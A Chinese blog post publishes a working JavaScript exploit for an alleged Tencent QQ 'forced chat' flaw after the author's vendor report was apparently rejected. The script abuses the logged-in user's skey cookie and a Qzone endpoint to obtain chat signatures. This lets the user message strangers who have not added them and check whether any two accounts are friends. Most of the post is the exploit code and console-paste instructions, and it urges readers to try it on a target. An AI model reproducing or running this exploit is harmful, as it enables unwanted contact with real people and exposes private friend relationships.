最新QQ强制聊天代码，同时可判断好友关系

QQ强聊虽然早就变成了一个传说，但现在依然可以实现。

小菜其实早就知道这个漏洞，但是一直没公布，前两天突然来兴致试了试，没想到漏洞依然存在。

然后小菜跑到了乌云漏洞报告平台举报漏洞，但没想到被腾讯鲁莽的否认了，他竟然说漏洞不存在，漏洞不存在，那些截图是怎么来的。。。小菜辛辛苦苦写的漏洞原理，就这么无情的被拒绝了。。。

小菜很失望，既然腾讯这么不负责任，那小菜就把漏洞发出来。

漏洞的具体原理，小菜已经在乌云上阐述了《腾讯QQ强制聊天漏洞》，十分的详细，在这不多说。

为了让读者更方便的利用此漏洞，小菜写了一个js脚本，脚本如下

 (function(exports){

   var chatVO = {
     //你的QQ
     yourQQ: "20737302",
     //你好友的QQ
     yourFQQ: "649374916",
     //女神的QQ
     targetQQ: "20618348",
     //女神好友的QQ
     targetFQQ: "649374916"
   };
   var config = {
     init: function(){
       var skey;
       skey = getCookie("skey") || getCookie("rv2") || "";
       function getCookie(name){
         var r = new RegExp("(?:^|;+|\\s+)" + name + "=([^;]*)"), m = document.cookie.match(r);
         return !m ? "" : m[1];
       }
       function _DJB (str) {
         var hash = 5381;
         for (var i = 0, len = str.length; i < len; ++i)
             hash += (hash << 5) + str.charCodeAt(i);
         return hash & 2147483647
       };

       this.sigURL = this.sigURL.replace("{{t}}",_DJB(skey));
     },
     sigURL: "http://r.qzone.qq.com/cgi-bin/user/cgi_tmp_talk?qzone_uin={{sender}}&to_uin={{receiver}}&g_tk={{t}}",
     chatURL: "tencent://message/?Menu=yes&uin={{sender}}&Service=112&SigT={{sigt}}&SigU={{sigu}}"
   };
   var util = {
     ajax: function(obj){
       var xmlHttp;

       if(obj.async === undefined){
         obj.async = true;
       }

       if(window.XMLHttpRequest){
           xmlHttp = new XMLHttpRequest();
       }else{
           xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
       }

       xmlHttp.onreadystatechange=function(){
         obj.callback(xmlHttp);
       };
       xmlHttp.open(obj.type,obj.url,obj.async);
       xmlHttp.send();
     }
   };
   var logic = {
     getSigU: function (sender,receiver){
       var sigu = "";
       util.ajax({
         url: config.sigURL.replace("{{sender}}",sender).replace("{{receiver}}",receiver),
         type: "get",
         async: false,
         callback: function(xhr){
           if(xhr.readyState == 4){
             var html = xhr.responseText.replace(/[\n]/g,"");
             if(/&SigU=/gmi.test(html)){
               sigu = html.split(/&SigU=/m)[1].split(/'/m)[0];
             }else{
               alert("你和你的好友，好友关系不成立！");
             }
           }
         }
       });

       return sigu;
     },
     getSigT: function (sender,receiver){
       var sigt = "";
       util.ajax({
         url: config.sigURL.replace("{{sender}}",sender).replace("{{receiver}}",receiver),
         type: "get",
         async: false,
         callback: function(xhr){
           if(xhr.readyState == 4){
             var html = xhr.responseText.replace(/[\n]/g,"");
             if(/&SigT=/gmi.test(html)){
               sigt = html.split(/&SigT=/m)[1].split(/&SigU=/m)[0];
             }else{
               alert("他和他的好友，好友关系不成立！");
             }
           }
         }
       });

       return sigt;
     },
     runChat: function (sender,sigu,sigt) {
       exports.location = config.chatURL.replace("{{sender}}",sender).replace("{{sigt}}",sigt).replace("{{sigu}}",sigu);
     }
   };

   config.init();

   var sigu = logic.getSigU(chatVO.yourQQ,chatVO.yourFQQ);
   var sigt = logic.getSigT(chatVO.targetFQQ,chatVO.targetQQ);

   logic.runChat(chatVO.targetQQ,sigu,sigt);

 })(this);

这个脚本，您只需要关注最顶部的四个参数，

• yourQQ: "20737302",
• yourFQQ: "649374916",
• targetQQ: "20618348",
• targetFQQ: "649374916"

这四个参数缺一不可，而且必须都正确，读者可根据自己的实际情况填写，主要就是女神好友的QQ可能不知道（任意一个好友即可），猜吧！

假如您不知道女神好友的QQ，乱填一个，会提示好友关系不成立，顺便还可以用这个提示测试两个人是不是好友，很实用吧！

　  测试的时候忽略了一个问题：女神好友的QQ(targetFQQ)，作为中间人，不能随便填，必须同时是你们两个的好友才可以。。。抱歉！！

接下来说说怎么运行这个脚本。

首先要用浏览器打开你的QQ空间，最好使用火狐和谷歌浏览器，然后保持QQ空间是登录状态。

然后在QQ空间的选项卡旁边新建一个选项卡，输入网址：http://r.qzone.qq.com，按回车转到，发现是一片空白，这就对了。

在浏览器上按F12打开控制台，把脚本粘贴到控制台中，运行即可。

为什么要这么做呢。。。登录QQ空间是为了拿到有效的cookie，否则没办法访问腾讯接口，而新建一个选项卡是为了避免跨域问题，同时又可以与登录的QQ空间共享cookie。

其他就没什么了，快动手试试吧！